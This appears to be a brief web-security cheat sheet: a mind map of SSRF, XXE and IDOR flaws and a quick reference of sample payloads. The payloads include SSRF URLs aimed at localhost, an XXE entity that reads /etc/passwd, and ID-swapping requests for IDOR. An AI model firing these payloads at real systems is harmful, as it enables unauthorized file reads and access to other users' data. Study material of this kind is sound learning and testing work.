Web Attacks Overview
Common web vulnerabilities
Interactive Mind Map
graph TD
A[Web App] --> B{Vulnerability}
B --> C[SSRF]
B --> D[XXE]
B --> E[IDOR]
C --> F[Internal Scan]
C --> G[Cloud Metadata]
D --> H[Read Files]
D --> I[NTLM Hash]
E --> J[Enumerate IDs]
E --> K[Access Data]
Quick Reference
SSRF
http://localhost:80    # Target local service
http://127.0.0.1       # Target loopback IP
http://0.0.0.0         # Target all interfaces
XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>
<data>&xxe;</data>    # Basic XXE payload to read /etc/passwd
IDOR
/api/user/1 → /api/user/2    # Change ID to access other user data
/download?file=123 → 124     # Change file ID to download other files